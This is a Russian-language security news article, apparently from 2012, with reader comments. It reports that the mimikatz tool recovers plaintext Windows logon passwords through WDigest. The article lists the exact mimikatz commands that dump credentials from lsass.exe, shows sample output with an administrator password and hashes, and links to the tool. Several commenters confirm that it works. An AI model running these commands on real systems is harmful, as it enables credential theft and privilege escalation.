Обнаружена опасная уязвимость в Microsoft Windows

image

Теги: уязвимость, Windows, кража данных

Локальный пользователь может получить доступ к потенциально важным данным.

Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.

Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.

Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

Вывод будет примерно следующим:

mimikatz # privilege::debug
Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 680
Attente de connexion du client...
Serveur connecte a un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donnees de securites dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;248844
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : PC01$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;575543
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : PC01
        msv1_0 :        lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed }
        wdigest :       password
        tspkg :         password

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;62105
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : PC01$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)
mimikatz #

Функционал mimikatz в настоящий момент внедряется в Metasploit Framework, и может быть взят на вооружение многими исследователями безопасности.

Скачать утилиту можно по адресу: http://blog.gentilkiwi.com/mimikatz

Описание уязвимости доступно по адресу: http://www.securitylab.ru/vulnerability/420418.php


или введите имя

CAPTCHA
Страницы: 1  2  3  
Нанобот
21-02-2012 19:43:14
для эксплуатации нужны права администратора и шо ж тут опасного?
0 |
lex
22-02-2012 07:44:06
то что хомячки сидят с админскими правами
0 |
..
22-02-2012 09:13:41
это чревато дальнейшим повышением привилегий в сети
0 |
27-07-2012 18:01:43
Данная угроза исключена при использовании антивирусов с модулем HIPS
0 |
Dmitriy
22-02-2012 07:46:50
McAfee определяет как троян Artemis!9F0B9ED77121
0 |
22-02-2012 08:07:48
KAV 6.0.4.xxxx обнаружил только в zip:\\Win32\KiwiRegedit.exe HEUR:Trojan.Win32.Generic на всё остальное не ругался
0 |
FilimoniC
22-02-2012 09:41:01
Десктопный каспер 6 MP4 проорал "Invader". Всё ок.Однако в серверном каспере 6.0 (kav_fs), насколько я знаю, из всей защиты только файловая оборона.
0 |
boris
22-02-2012 09:32:19
Malware@2awikhptpfdxj в Comodo высокая опасносте
0 |
22-02-2012 11:13:11
Работает, выдал пароль)
0 |
Svolo4enok
22-02-2012 11:55:04
работает!!!
0 |
Страницы: 1  2  3